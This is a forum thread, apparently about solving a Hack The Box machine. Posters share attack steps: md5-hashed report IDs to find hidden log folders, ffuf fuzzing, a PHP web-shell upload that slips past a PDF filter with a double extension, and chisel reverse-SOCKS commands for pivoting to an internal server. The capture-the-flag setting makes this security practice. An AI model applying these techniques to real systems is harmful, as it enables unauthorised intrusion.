Posts: 0 Threads: 0 Joined: N/A August 6, 2022 at 8:59 PM (August 6, 2022, 08:34 PM)paulwatson42016 Wrote: (August 6, 2022, 08:30 PM)karhu Wrote: (August 6, 2022, 08:09 PM)farkow Wrote: (August 6, 2022, 08:05 PM)karhu Wrote: Found three additional reports to the ones posted in the blog:
2589
3478
4221
7612
8121
9798
Of note, on 9798, this is listed:
[+] LOGS : logs/e21cece511f43a5cb18d4932429915ed/
Page shows nothing, and returns a blank index.html with wget.
Three new domains are listed in the reports, but I don't think any have to do with the machine:
healtharcade.io.htb
actionmeter.org.htb
bethebest101.uk.htb
Exactly, and when you check e21cece511f43a5cb18d4932429915ed on crackstation, it shows the id of the report.
So, the question is, when you md5 all those available reports and check their logs folder, will there be any file discovery?
Right, this is what I'm working on currently, but I'm not making much headway. Running ffuf on /HASH/FUZZ where HASH is the list of md5(report#) and FUZZ is a list of common filenames. All that has returned so far is just index.html which are all empty.
There is logs.pdf in md5 of one of the report numbers
It shows file upload page and you see it on there having php shell upload Where the pdf file is uploaded? Posts: 56 Threads: 0 Joined: N/A August 6, 2022 at 9:08 PM (August 6, 2022, 08:59 PM)nhocit Wrote: (August 6, 2022, 08:34 PM)paulwatson42016 Wrote: (August 6, 2022, 08:30 PM)karhu Wrote: (August 6, 2022, 08:09 PM)farkow Wrote: (August 6, 2022, 08:05 PM)karhu Wrote: Found three additional reports to the ones posted in the blog:
2589
3478
4221
7612
8121
9798
Of note, on 9798, this is listed:
[+] LOGS : logs/e21cece511f43a5cb18d4932429915ed/
Page shows nothing, and returns a blank index.html with wget.
Three new domains are listed in the reports, but I don't think any have to do with the machine:
healtharcade.io.htb
actionmeter.org.htb
bethebest101.uk.htb
Exactly, and when you check e21cece511f43a5cb18d4932429915ed on crackstation, it shows the id of the report.
So, the question is, when you md5 all those available reports and check their logs folder, will there be any file discovery?
Right, this is what I'm working on currently, but I'm not making much headway. Running ffuf on /HASH/FUZZ where HASH is the list of md5(report#) and FUZZ is a list of common filenames. All that has returned so far is just index.html which are all empty.
There is logs.pdf in md5 of one of the report numbers
It shows file upload page and you see it on there having php shell upload
Where the pdf file is uploaded? I believe it's uploaded to /logs/uploads. Found that directory while enumerating the site. Not sure if/how the filenames are manipulated before storage, though. EDIT: I confirmed that you can just do /logs/uploads/<file>.pdf to find the upload. Posts: 70 Threads: 0 Joined: N/A August 6, 2022 at 9:10 PM (August 6, 2022, 08:59 PM)nhocit Wrote: (August 6, 2022, 08:34 PM)paulwatson42016 Wrote: (August 6, 2022, 08:30 PM)karhu Wrote: (August 6, 2022, 08:09 PM)farkow Wrote: (August 6, 2022, 08:05 PM)karhu Wrote: Found three additional reports to the ones posted in the blog:
2589
3478
4221
7612
8121
9798
Of note, on 9798, this is listed:
[+] LOGS : logs/e21cece511f43a5cb18d4932429915ed/
Page shows nothing, and returns a blank index.html with wget.
Three new domains are listed in the reports, but I don't think any have to do with the machine:
healtharcade.io.htb
actionmeter.org.htb
bethebest101.uk.htb
Exactly, and when you check e21cece511f43a5cb18d4932429915ed on crackstation, it shows the id of the report.
So, the question is, when you md5 all those available reports and check their logs folder, will there be any file discovery?
Right, this is what I'm working on currently, but I'm not making much headway. Running ffuf on /HASH/FUZZ where HASH is the list of md5(report#) and FUZZ is a list of common filenames. All that has returned so far is just index.html which are all empty.
There is logs.pdf in md5 of one of the report numbers
It shows file upload page and you see it on there having php shell upload
Where the pdf file is uploaded? Did not you FUZZ /logs folder already? Posts: 26 Threads: 0 Joined: N/A August 6, 2022 at 9:12 PM
cat /usr/local/sbin/startup.sh
#!/bin/sh
/usr/bin/php -S 127.0.0.1:8080 -t /opt/site.new/
Posts: 0 Threads: 0 Joined: N/A August 6, 2022 at 9:23 PM (August 6, 2022, 09:10 PM)farkow Wrote: (August 6, 2022, 08:59 PM)nhocit Wrote: (August 6, 2022, 08:34 PM)paulwatson42016 Wrote: (August 6, 2022, 08:30 PM)karhu Wrote: (August 6, 2022, 08:09 PM)farkow Wrote: Exactly, and when you check e21cece511f43a5cb18d4932429915ed on crackstation, it shows the id of the report.
So, the question is, when you md5 all those available reports and check their logs folder, will there be any file discovery?
Right, this is what I'm working on currently, but I'm not making much headway. Running ffuf on /HASH/FUZZ where HASH is the list of md5(report#) and FUZZ is a list of common filenames. All that has returned so far is just index.html which are all empty.
There is logs.pdf in md5 of one of the report numbers
It shows file upload page and you see it on there having php shell upload
Where the pdf file is uploaded?
Did not you FUZZ /logs folder already? God it already! Posts: 132 Threads: 0 Joined: N/A August 6, 2022 at 10:22 PM (August 6, 2022, 09:12 PM)loge23 Wrote:
cat /usr/local/sbin/startup.sh
#!/bin/sh
/usr/bin/php -S 127.0.0.1:8080 -t /opt/site.new/
On you machine:
chisel server -p 3477 --reverse
On target:
./chisel client YOUR-IP:3477 R:socks
Add 127.0.0.1 moderators.htb to /etc/hosts You can now access moderators.htb:8080 using foxyProxy for exemple Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 12:20 AM any hint for how to bypass pdf filter ? won't let me upload even normal pdf :s Posts: 132 Threads: 0 Joined: N/A August 7, 2022 at 12:24 AM (August 7, 2022, 12:20 AM)vexxxi Wrote: any hint for how to bypass pdf filter ? won't let me upload even normal pdf :s You have to set the name like something.pdf.php and keep the pdf first line and last line format Posts: 24 Threads: 0 Joined: N/A August 7, 2022 at 12:49 AM (August 7, 2022, 12:24 AM)fironeDerbert Wrote: (August 7, 2022, 12:20 AM)vexxxi Wrote: any hint for how to bypass pdf filter ? won't let me upload even normal pdf :s
You have to set the name like something.pdf.php and keep the pdf first line and last line format just tried that and wasn't able to get it to go through just always says only pdfs allowed it should be getting uploaded to /logs/uploads/ right ? Posts: 132 Threads: 0 Joined: N/A August 7, 2022 at 1:12 AM (August 7, 2022, 12:49 AM)vexxxi Wrote: (August 7, 2022, 12:24 AM)fironeDerbert Wrote: (August 7, 2022, 12:20 AM)vexxxi Wrote: any hint for how to bypass pdf filter ? won't let me upload even normal pdf :s
You have to set the name like something.pdf.php and keep the pdf first line and last line format
just tried that and wasn't able to get it to go through just always says only pdfs allowed
it should be getting uploaded to /logs/uploads/ right ? Try to upload a regular pdf and see how the filter works, and yes the file will be uploaded in /logs/uploads |
